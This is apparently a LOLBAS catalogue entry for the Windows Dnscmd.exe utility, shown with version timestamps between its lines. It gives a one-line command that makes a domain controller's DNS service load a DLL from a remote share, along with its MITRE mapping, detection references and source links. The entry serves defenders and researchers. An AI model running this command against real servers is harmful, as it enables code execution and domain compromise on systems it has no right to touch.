2018-09-24 21:59:43 +02:00
---
Name : Dnscmd.exe
Description : A command-line interface for managing DNS servers
Author : 'Oddvar Moe'
2021-01-10 16:04:52 +01:00
Created : 2018-05-25
2018-09-24 21:59:43 +02:00
Commands :
- Command : dnscmd.exe dc1.lab.int /config /serverlevelplugindll \\192.168.0.149\dll\wtf.dll
Description : Adds a specially crafted DLL as a plug-in of the DNS Service. This command must be run on a DC by a user that is at least a member of the DnsAdmins group. See the reference links for DLL details.
2021-11-05 19:58:26 +01:00
Usecase : Remotely inject dll to dns server
2018-09-24 21:59:43 +02:00
Category : Execute
Privileges : DNS admin
2021-11-05 19:58:26 +01:00
MitreID : T1543.003
2018-09-24 21:59:43 +02:00
OperatingSystem : Windows server
2018-12-10 14:28:12 +01:00
Full_Path :
2018-09-24 21:59:43 +02:00
- Path : C:\Windows\System32\Dnscmd.exe
- Path : C:\Windows\SysWOW64\Dnscmd.exe
2021-01-10 16:04:52 +01:00
Code_Sample :
2022-09-11 07:07:18 +02:00
- Code :
2018-09-24 21:59:43 +02:00
Detection :
2022-09-11 07:07:18 +02:00
- Sigma : https://github.com/SigmaHQ/sigma/blob/b08b3e2b0d5111c637dbede1381b07cb79f8c2eb/rules/windows/process_creation/process_creation_dns_serverlevelplugindll.yml
- IOC : Dnscmd.exe loading dll from UNC/arbitrary path
2018-09-24 21:59:43 +02:00
Resources :
- Link : https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83
- Link : https://blog.3or.de/hunting-dns-server-level-plugin-dll-injection.html
- Link : https://github.com/dim0x69/dns-exe-persistance/tree/master/dns-plugindll-vcpp
- Link : https://twitter.com/Hexacorn/status/994000792628719618
- Link : http://www.labofapenetrationtester.com/2017/05/abusing-dnsadmins-privilege-for-escalation-in-active-directory.html
Acknowledgement :
- Person : Shay Ber
Handle :
- Person : Dimitrios Slamaris
Handle : '@dim0x69'
- Person : Nikhil SamratAshok
Handle : '@nikhil_mitt'